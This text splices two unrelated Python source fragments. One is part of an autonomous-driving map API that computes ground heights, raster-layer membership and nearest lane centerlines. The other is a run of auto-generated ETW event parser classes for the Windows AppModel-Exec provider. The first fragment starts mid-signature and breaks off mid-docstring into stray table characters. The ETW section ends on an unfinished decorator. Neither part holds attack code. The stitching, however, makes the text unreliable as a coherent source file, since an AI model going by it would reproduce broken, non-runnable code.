# NOTE: extraction artifact (dataset table header) removed; file content begins below.
np.ndarray, city_name: str) -> np.ndarray:
"""
Check whether each point is likely to be from the ground surface
Args:
point_cloud: Numpy array of shape (N,3)
city_name: either 'MIA' for Miami or 'PIT' for Pittsburgh
Returns:
is_ground_boolean_arr: Numpy array of shape (N,) where ith entry is True if the LiDAR return
is likely a hit from the ground surface.
"""
ground_height_values = self.get_ground_height_at_xy(point_cloud, city_name)
is_ground_boolean_arr = (np.absolute(point_cloud[:, 2] - ground_height_values) <= GROUND_HEIGHT_THRESHOLD) | (
np.array(point_cloud[:, 2] - ground_height_values) < 0
)
return is_ground_boolean_arr
def get_ground_height_at_xy(self, point_cloud: np.ndarray, city_name: str) -> np.ndarray:
    """
    Get ground height for each of the xy locations in point_cloud.

    Args:
        point_cloud: Numpy array of shape (k,2) or (k,3)
        city_name: either 'MIA' for Miami or 'PIT' for Pittsburgh

    Returns:
        ground_height_values: Numpy array of shape (k,). Entries are NaN for
            query points that fall outside the rasterized ground-height map.
    """
    ground_height_mat, npyimage_to_city_se2_mat = self.get_rasterized_ground_height(city_name)
    city_coords = np.round(point_cloud[:, :2]).astype(np.int64)

    # Build the SE2 transform that maps city coordinates into npy-image coordinates.
    se2_rotation = npyimage_to_city_se2_mat[:2, :2]
    se2_trans = npyimage_to_city_se2_mat[:2, 2]
    npyimage_to_city_se2 = SE2(rotation=se2_rotation, translation=se2_trans)
    npyimage_coords = npyimage_to_city_se2.transform_point_cloud(city_coords)
    npyimage_coords = npyimage_coords.astype(np.int64)

    ground_height_values = np.full((npyimage_coords.shape[0]), np.nan)
    # Guard BOTH bounds. The original code only checked the upper bounds, so a
    # negative npy-image coordinate would silently wrap around and read a value
    # from the opposite edge of the raster. This also makes the validity mask
    # consistent with get_raster_layer_points_boolean.
    ind_valid_pts = (
        (npyimage_coords[:, 1] >= 0)
        & (npyimage_coords[:, 1] < ground_height_mat.shape[0])
        & (npyimage_coords[:, 0] >= 0)
        & (npyimage_coords[:, 0] < ground_height_mat.shape[1])
    )
    # (x, y) city locations index the raster at (row=y, col=x).
    ground_height_values[ind_valid_pts] = ground_height_mat[
        npyimage_coords[ind_valid_pts, 1], npyimage_coords[ind_valid_pts, 0]
    ]
    return ground_height_values
def append_height_to_2d_city_pt_cloud(self, pt_cloud_xy: np.ndarray, city_name: str) -> np.ndarray:
    """
    Lift a 2d (xy-plane) point cloud into 3d by appending the ground height as z.

    Args:
        pt_cloud_xy: Numpy array of shape (N,2)
        city_name: either 'MIA' for Miami or 'PIT' for Pittsburgh

    Returns:
        pt_cloud_xyz: Numpy array of shape (N,3)
    """
    # Query the rasterized ground map for z at each xy location, then append
    # the heights as a third column.
    heights = self.get_ground_height_at_xy(pt_cloud_xy, city_name)
    return np.hstack([pt_cloud_xy, heights.reshape(-1, 1)])
def get_raster_layer_points_boolean(self, point_cloud: np.ndarray, city_name: str, layer_name: str) -> np.ndarray:
    """
    Check whether each point falls inside a rasterized map layer.

    Args:
        point_cloud: Numpy array of shape (N,3)
        city_name: either 'MIA' for Miami or 'PIT' for Pittsburgh
        layer_name: either "roi" (region of interest) or "driveable_area"

    Returns:
        is_layer_boolean_arr: Numpy array of shape (N,) where the ith entry is
            True if the ith point lies within the requested layer. Points that
            map outside the raster are False.

    Raises:
        ValueError: if layer_name is neither "roi" nor "driveable_area".
    """
    if layer_name == "roi":
        layer_raster_mat, npyimage_to_city_se2_mat = self.get_rasterized_roi(city_name)
    elif layer_name == "driveable_area":
        (
            layer_raster_mat,
            npyimage_to_city_se2_mat,
        ) = self.get_rasterized_driveable_area(city_name)
    else:
        # Fixed typo in the original message ("wither" -> "either").
        raise ValueError("layer_name should be either roi or driveable_area.")

    city_coords = np.round(point_cloud[:, :2]).astype(np.int64)
    se2_rotation = npyimage_to_city_se2_mat[:2, :2]
    se2_trans = npyimage_to_city_se2_mat[:2, 2]
    npyimage_to_city_se2 = SE2(rotation=se2_rotation, translation=se2_trans)
    npyimage_coords = npyimage_to_city_se2.transform_point_cloud(city_coords)
    npyimage_coords = npyimage_coords.astype(np.int64)

    layer_values = np.full((npyimage_coords.shape[0]), 0.0)
    # Index 0 is a valid raster coordinate: use >= 0. The original '> 0'
    # wrongly discarded points that map to row or column zero.
    ind_valid_pts = (
        (npyimage_coords[:, 1] >= 0)
        & (npyimage_coords[:, 1] < layer_raster_mat.shape[0])
        & (npyimage_coords[:, 0] >= 0)
        & (npyimage_coords[:, 0] < layer_raster_mat.shape[1])
    )
    # index in at (x,y) locations, which are (y,x) in the image
    layer_values[ind_valid_pts] = layer_raster_mat[
        npyimage_coords[ind_valid_pts, 1], npyimage_coords[ind_valid_pts, 0]
    ]
    is_layer_boolean_arr = layer_values == 1.0
    return is_layer_boolean_arr
def get_nearest_centerline(
    self, query_xy_city_coords: np.ndarray, city_name: str, visualize: bool = False
) -> Tuple[LaneSegment, float, np.ndarray]:
    """
    Find the lane centerline nearest to a 2d query point.

    KD Tree with k-closest neighbors or a fixed radius search on the lane centroids
    is unreliable since (1) there is highly variable density throughout the map and (2)
    lane lengths differ enormously, meaning the centroid is not indicative of nearby points.
    If no lanes are found with MAX_LABEL_DIST_TO_LANE, we increase the search radius.

    A correct approach is to compare centerline-to-query point distances, e.g. as done
    in Shapely. Instead of looping over all points, we precompute the bounding boxes of
    each lane. We use the closest_waypoint as our criterion; using the smallest sum to
    waypoints does not work in many cases with disproportionately shaped lane segments.

    Args:
        query_xy_city_coords: Numpy array of shape (2,) representing xy position of query in city coordinates
        city_name: either 'MIA' for Miami or 'PIT' for Pittsburgh
        visualize: if True, plot the query point and nearby candidate centerlines
    Returns:
        lane_object: Python dictionary with fields describing a lane.
            Keys include: 'centerline', 'predecessor', 'successor', 'turn_direction',
            'is_intersection', 'has_traffic_control', 'is_autonomous', 'is_routable'
        conf: real-valued confidence. less than 0.85 is almost always unreliable
        dense_centerline: numpy array of the densely-interpolated closest centerline
    """
    query_x = query_xy_city_coords[0]
    query_y = query_xy_city_coords[1]
    lane_centerlines_dict = self.city_lane_centerlines_dict[city_name]
    # Start from the default labeling radius and keep doubling it until at
    # least one lane bounding box overlaps the query neighborhood.
    search_radius = MAX_LABEL_DIST_TO_LANE
    while True:
        nearby_lane_ids = self.get_lane_ids_in_xy_bbox(
            query_x, query_y, city_name, query_search_range_manhattan=search_radius
        )
        if not nearby_lane_ids:
            search_radius *= 2  # double search radius
        else:
            break
    nearby_lane_objs = [lane_centerlines_dict[lane_id] for lane_id in nearby_lane_ids]
    cache = lane_waypt_to_query_dist(query_xy_city_coords, nearby_lane_objs)
    per_lane_dists, min_dist_nn_indices, dense_centerlines = cache
    # min_dist_nn_indices appears to order candidates by waypoint distance, so
    # index 0 selects the closest lane — TODO confirm in lane_waypt_to_query_dist.
    closest_lane_obj = nearby_lane_objs[min_dist_nn_indices[0]]
    dense_centerline = dense_centerlines[min_dist_nn_indices[0]]
    # estimate confidence: 1.0 at zero distance, decaying linearly with the
    # minimum waypoint distance, clipped below at 0.
    conf = 1.0 - (per_lane_dists.min() / OUT_OF_RANGE_LANE_DIST_THRESHOLD)
    conf = max(0.0, conf)  # clip to ensure positive value
    if visualize:
        # visualize dists to nearby centerlines
        fig = plt.figure(figsize=(22.5, 8))
        ax = fig.add_subplot(111)
        (query_x, query_y) = query_xy_city_coords.squeeze()
        ax.scatter([query_x], [query_y], 100, color="k", marker=".")
        # make another plot now!
        self.plot_nearby_halluc_lanes(ax, city_name, query_x, query_y)
        for i, line in enumerate(dense_centerlines):
            ax.plot(line[:, 0], line[:, 1], color="y")
            ax.text(line[:, 0].mean(), line[:, 1].mean(), str(per_lane_dists[i]))
        ax.axis("equal")
        plt.show()
        plt.close("all")
    return closest_lane_obj, conf, dense_centerline
def get_lane_direction(
    self, query_xy_city_coords: np.ndarray, city_name: str, visualize: bool = False
) -> Tuple[np.ndarray, float]:
    """
    Estimate the travel direction of the lane closest to a query position.

    The direction is taken from the densely-interpolated centerline rather than
    the sparse one stored on the lane object.

    Args:
        query_xy_city_coords: Numpy array of shape (2,) representing (x,y) position in city coordinates
        city_name: either 'MIA' for Miami or 'PIT' for Pittsburgh
        visualize: if True, plot the centerline, query point, and direction arrow

    Returns:
        lane_dir_vector: Numpy array of shape (2,) — direction (as a vector) of the
            closest lane at the query position, in city coordinates
        conf: real-valued confidence. less than 0.85 is almost always unreliable
    """
    _lane_obj, confidence, dense_centerline = self.get_nearest_centerline(
        query_xy_city_coords, city_name
    )
    # Locate the two waypoints nearest the query; the lane direction is the
    # vector from the earlier of the pair to the later one.
    waypt_dists = np.linalg.norm(dense_centerline - query_xy_city_coords, axis=1)
    nearest_pair = np.argsort(waypt_dists)[:2]
    start_idx = nearest_pair.min()
    end_idx = nearest_pair.max()
    lane_dir_vector = dense_centerline[end_idx] - dense_centerline[start_idx]

    if visualize:
        plt.plot(dense_centerline[:, 0], dense_centerline[:, 1], color="y")
        plt.scatter(
            query_xy_city_coords[0],
            query_xy_city_coords[1],
            200,
            marker=".",
            color="b",
        )
        # Scale the arrow up so the direction is visible at map scale.
        dx = lane_dir_vector[0] * 10
        dy = lane_dir_vector[1] * 10
        plt.arrow(
            query_xy_city_coords[0],
            query_xy_city_coords[1],
            dx,
            dy,
            color="r",
            width=0.3,
            zorder=2,
        )
        for waypt_idx in range(dense_centerline.shape[0]):
            plt.scatter(
                dense_centerline[waypt_idx, 0],
                dense_centerline[waypt_idx, 1],
                waypt_idx / 5.0,
                marker=".",
                color="k",
            )
        plt.axis("equal")
        plt.show()
        plt.close("all")

    return lane_dir_vector, confidence
def get_lane_ids_in_xy_bbox(
    self,
    query_x: float,
    query_y: float,
    city_name: str,
    query_search_range_manhattan: float = 5.0,
) -> List[int]:
    """
    Collect all lane segment IDs whose precomputed bounding boxes overlap a
    square search window around the query point.

    This is a vectorized approximation of a bubble search for point-to-polygon
    distance: the hallucinated lane polygon extents are precomputed in the map,
    so a Manhattan-radius window test prunes lanes without any per-point loop.

    Args:
        query_x: x coordinate of the xy query location
        query_y: y coordinate of the xy query location
        city_name: either 'MIA' for Miami or 'PIT' for Pittsburgh
        query_search_range_manhattan: search radius along each axis

    Returns:
        lane_ids: lane segment IDs that live within the search bubble
    """
    half = query_search_range_manhattan
    # Window layout expected downstream: [min_x, min_y, max_x, max_y].
    query_window = np.array([query_x - half, query_y - half, query_x + half, query_y + half])
    overlap_indxs = find_all_polygon_bboxes_overlapping_query_bbox(
        self.city_halluc_bbox_table[city_name], query_window
    )
    if len(overlap_indxs) == 0:
        return []
    # Translate table row indices into lane segment IDs (keys are strings).
    tableidx_to_laneid = self.city_halluc_tableidx_to_laneid_map[city_name]
    return [tableidx_to_laneid[str(overlap_idx)] for overlap_idx in overlap_indxs]
def get_lane_segment_predecessor_ids(self, lane_segment_id: int, city_name: str) -> List[int]:
    """
    Look up the IDs of the lane segments that precede the given lane segment.

    Args:
        lane_segment_id: unique identifier for a lane segment within a city
        city_name: either 'MIA' for Miami or 'PIT' for Pittsburgh

    Returns:
        predecessor_ids: lane segment IDs of the predecessors
    """
    lane_segment = self.city_lane_centerlines_dict[city_name][lane_segment_id]
    return lane_segment.predecessors
def get_lane_segment_successor_ids(self, lane_segment_id: int, city_name: str) -> Optional[List[int]]:
    """
    Look up the IDs of the lane segments that follow the given lane segment.

    Args:
        lane_segment_id: unique identifier for a lane segment within a city
        city_name: either 'MIA' for Miami or 'PIT' for Pittsburgh

    Returns:
        successor_ids: lane segment IDs of the successors (may be None).
    """
    lane_segment = self.city_lane_centerlines_dict[city_name][lane_segment_id]
    return lane_segment.successors
def get_lane_segment_adjacent_ids(self, lane_segment_id: int, city_name: str) -> List[Optional[int]]:
"""
Get land id for the lane adjacent left/right neighbor of the specified lane_segment_id
Args:
lane_segment_id: unique identifier | |
# -*- coding: utf-8 -*-
"""
Microsoft-Windows-AppModel-Exec
GUID : eb65a492-86c0-406a-bace-9912d595bd69
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
# Auto-generated ETW payload templates for provider Microsoft-Windows-AppModel-Exec
# (GUID eb65a492-86c0-406a-bace-9912d595bd69), events 100-138. Each class binds one
# (event_id, version) pair to the construct Struct describing its payload layout.
# Field names are part of the provider's wire schema and must not be altered.
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=100, version=0)
class Microsoft_Windows_AppModel_Exec_100_0(Etw):
    pattern = Struct(
        "PsmKey" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=101, version=0)
class Microsoft_Windows_AppModel_Exec_101_0(Etw):
    pattern = Struct(
        "PsmKey" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=102, version=0)
class Microsoft_Windows_AppModel_Exec_102_0(Etw):
    pattern = Struct(
        "PsmKey" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=103, version=0)
class Microsoft_Windows_AppModel_Exec_103_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "AppPsmKey" / WString,
        "State" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=104, version=0)
class Microsoft_Windows_AppModel_Exec_104_0(Etw):
    pattern = Struct(
        "Removal" / Int8ul,
        "SrcPsmKey" / WString,
        "TargetPsmKey" / WString,
        "Type" / Int32ul,
        "Error" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=105, version=0)
class Microsoft_Windows_AppModel_Exec_105_0(Etw):
    pattern = Struct(
        "ValueName" / WString,
        "Time" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=107, version=0)
class Microsoft_Windows_AppModel_Exec_107_0(Etw):
    pattern = Struct(
        "HwndPointer" / Int64ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=108, version=0)
class Microsoft_Windows_AppModel_Exec_108_0(Etw):
    pattern = Struct(
        "HwndPointer" / Int64ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=109, version=0)
class Microsoft_Windows_AppModel_Exec_109_0(Etw):
    pattern = Struct(
        "PsmKey" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=110, version=0)
class Microsoft_Windows_AppModel_Exec_110_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "Bool" / Int8ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=111, version=0)
class Microsoft_Windows_AppModel_Exec_111_0(Etw):
    pattern = Struct(
        "Hwnd" / Int64ul,
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=112, version=0)
class Microsoft_Windows_AppModel_Exec_112_0(Etw):
    pattern = Struct(
        "AUMID" / WString,
        "PID" / WString,
        "Count" / Int64ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=113, version=0)
class Microsoft_Windows_AppModel_Exec_113_0(Etw):
    pattern = Struct(
        "AUMID" / WString,
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=114, version=0)
class Microsoft_Windows_AppModel_Exec_114_0(Etw):
    pattern = Struct(
        "PackageLevel" / Int8ul,
        "ErrorCode" / Int32ul,
        "Cookie" / Int64sl
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=115, version=0)
class Microsoft_Windows_AppModel_Exec_115_0(Etw):
    pattern = Struct(
        "AUMID" / WString,
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=116, version=0)
class Microsoft_Windows_AppModel_Exec_116_0(Etw):
    pattern = Struct(
        "PsmKey" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=117, version=0)
class Microsoft_Windows_AppModel_Exec_117_0(Etw):
    pattern = Struct(
        "AUMID" / WString,
        "Bool1" / Int8ul,
        "Bool2" / Int8ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=118, version=0)
class Microsoft_Windows_AppModel_Exec_118_0(Etw):
    pattern = Struct(
        "AUMID" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=119, version=0)
class Microsoft_Windows_AppModel_Exec_119_0(Etw):
    pattern = Struct(
        "AUMID" / WString,
        "Flags" / Int32ul,
        "Reason" / Int64sl
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=120, version=0)
class Microsoft_Windows_AppModel_Exec_120_0(Etw):
    pattern = Struct(
        "MaxTterminate" / Int8ul,
        "AUMID" / WString,
        "ErrorCode" / Int32ul,
        "Reason" / Int64sl,
        "Misbehaving" / Int8ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=121, version=0)
class Microsoft_Windows_AppModel_Exec_121_0(Etw):
    pattern = Struct(
        "AUMID" / WString,
        "Flags" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=122, version=0)
class Microsoft_Windows_AppModel_Exec_122_0(Etw):
    pattern = Struct(
        "PlmFlags" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=123, version=0)
class Microsoft_Windows_AppModel_Exec_123_0(Etw):
    pattern = Struct(
        "AUMID" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=124, version=0)
class Microsoft_Windows_AppModel_Exec_124_0(Etw):
    pattern = Struct(
        "AUMID" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=125, version=0)
class Microsoft_Windows_AppModel_Exec_125_0(Etw):
    pattern = Struct(
        "ValueName" / WString,
        "Time" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=126, version=0)
class Microsoft_Windows_AppModel_Exec_126_0(Etw):
    pattern = Struct(
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=127, version=0)
class Microsoft_Windows_AppModel_Exec_127_0(Etw):
    pattern = Struct(
        "AUMID" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=128, version=0)
class Microsoft_Windows_AppModel_Exec_128_0(Etw):
    pattern = Struct(
        "PID" / Int32ul,
        "ErrorCode" / Int32ul,
        "PackageState" / Int64sl
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=129, version=0)
class Microsoft_Windows_AppModel_Exec_129_0(Etw):
    pattern = Struct(
        "AUMID" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=130, version=0)
class Microsoft_Windows_AppModel_Exec_130_0(Etw):
    pattern = Struct(
        "SuspendExemptionReason" / Int32ul,
        "Priority" / Int32ul,
        "PsmKey" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=131, version=0)
class Microsoft_Windows_AppModel_Exec_131_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "Priority" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=132, version=0)
class Microsoft_Windows_AppModel_Exec_132_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "Priority" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=133, version=0)
class Microsoft_Windows_AppModel_Exec_133_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "Priority" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=134, version=0)
class Microsoft_Windows_AppModel_Exec_134_0(Etw):
    pattern = Struct(
        "PsmKey" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=135, version=0)
class Microsoft_Windows_AppModel_Exec_135_0(Etw):
    pattern = Struct(
        "PsmKey" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=136, version=0)
class Microsoft_Windows_AppModel_Exec_136_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "Exemption" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=137, version=0)
class Microsoft_Windows_AppModel_Exec_137_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "Bool" / Int8ul,
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=138, version=0)
class Microsoft_Windows_AppModel_Exec_138_0(Etw):
    pattern = Struct(
        "PsmKey" / WString
    )
# Auto-generated ETW payload templates for provider Microsoft-Windows-AppModel-Exec,
# events 140-175 (event IDs are not contiguous in the provider manifest).
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=140, version=0)
class Microsoft_Windows_AppModel_Exec_140_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "AUMID" / WString,
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=142, version=0)
class Microsoft_Windows_AppModel_Exec_142_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "TimeOut" / Int64sl
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=143, version=0)
class Microsoft_Windows_AppModel_Exec_143_0(Etw):
    pattern = Struct(
        "PackageFamilyName" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=144, version=0)
class Microsoft_Windows_AppModel_Exec_144_0(Etw):
    pattern = Struct(
        "PackageFamilyName" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=145, version=0)
class Microsoft_Windows_AppModel_Exec_145_0(Etw):
    pattern = Struct(
        "PackageFullName" / WString,
        "Time" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=146, version=0)
class Microsoft_Windows_AppModel_Exec_146_0(Etw):
    pattern = Struct(
        "PackageFullName" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=147, version=0)
class Microsoft_Windows_AppModel_Exec_147_0(Etw):
    pattern = Struct(
        "PackageFullName" / WString,
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=148, version=0)
class Microsoft_Windows_AppModel_Exec_148_0(Etw):
    pattern = Struct(
        "PackageFullName" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=149, version=0)
class Microsoft_Windows_AppModel_Exec_149_0(Etw):
    pattern = Struct(
        "PackageFullName" / WString,
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=150, version=0)
class Microsoft_Windows_AppModel_Exec_150_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "Trigger" / Int32ul,
        "Reason" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=151, version=0)
class Microsoft_Windows_AppModel_Exec_151_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "Trigger" / Int32ul,
        "Reason" / Int32ul,
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=152, version=0)
class Microsoft_Windows_AppModel_Exec_152_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "Trigger" / Int32ul,
        "Reason" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=153, version=0)
class Microsoft_Windows_AppModel_Exec_153_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "Trigger" / Int32ul,
        "Reason" / Int32ul,
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=154, version=0)
class Microsoft_Windows_AppModel_Exec_154_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "Trigger" / Int32ul,
        "Reason" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=155, version=0)
class Microsoft_Windows_AppModel_Exec_155_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "Trigger" / Int32ul,
        "Reason" / Int32ul,
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=156, version=0)
class Microsoft_Windows_AppModel_Exec_156_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "Type" / Int32ul,
        "Reason" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=157, version=0)
class Microsoft_Windows_AppModel_Exec_157_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "LogErrorCode" / Int32ul,
        "TerminationErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=158, version=0)
class Microsoft_Windows_AppModel_Exec_158_0(Etw):
    pattern = Struct(
        "PackageFullName" / WString,
        "Type" / Int32ul,
        "Reason" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=159, version=0)
class Microsoft_Windows_AppModel_Exec_159_0(Etw):
    pattern = Struct(
        "PackageFullName" / WString,
        "plmKnowsPackage" / Int8ul,
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=161, version=0)
class Microsoft_Windows_AppModel_Exec_161_0(Etw):
    pattern = Struct(
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=162, version=0)
class Microsoft_Windows_AppModel_Exec_162_0(Etw):
    pattern = Struct(
        "PsmKey" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=164, version=0)
class Microsoft_Windows_AppModel_Exec_164_0(Etw):
    pattern = Struct(
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=165, version=0)
class Microsoft_Windows_AppModel_Exec_165_0(Etw):
    pattern = Struct(
        "PidCount" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=166, version=0)
class Microsoft_Windows_AppModel_Exec_166_0(Etw):
    pattern = Struct(
        "StateSource" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=167, version=0)
class Microsoft_Windows_AppModel_Exec_167_0(Etw):
    pattern = Struct(
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=168, version=0)
class Microsoft_Windows_AppModel_Exec_168_0(Etw):
    pattern = Struct(
        "AUMID" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=169, version=0)
class Microsoft_Windows_AppModel_Exec_169_0(Etw):
    pattern = Struct(
        "AUMID" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=170, version=0)
class Microsoft_Windows_AppModel_Exec_170_0(Etw):
    pattern = Struct(
        "PsmKey" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=171, version=0)
class Microsoft_Windows_AppModel_Exec_171_0(Etw):
    pattern = Struct(
        "PsmKey" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=172, version=0)
class Microsoft_Windows_AppModel_Exec_172_0(Etw):
    pattern = Struct(
        "PsmKey" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=173, version=0)
class Microsoft_Windows_AppModel_Exec_173_0(Etw):
    pattern = Struct(
        "PsmKey" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=174, version=0)
class Microsoft_Windows_AppModel_Exec_174_0(Etw):
    pattern = Struct(
        "PsmKey" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=175, version=0)
class Microsoft_Windows_AppModel_Exec_175_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "ErrorCode" / Int32ul
    )
# Auto-generated ETW payload templates for provider Microsoft-Windows-AppModel-Exec,
# events 176-203.
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=176, version=0)
class Microsoft_Windows_AppModel_Exec_176_0(Etw):
    pattern = Struct(
        "PsmKey" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=177, version=0)
class Microsoft_Windows_AppModel_Exec_177_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=178, version=0)
class Microsoft_Windows_AppModel_Exec_178_0(Etw):
    pattern = Struct(
        "CommandLine" / WString,
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=179, version=0)
class Microsoft_Windows_AppModel_Exec_179_0(Etw):
    pattern = Struct(
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=180, version=0)
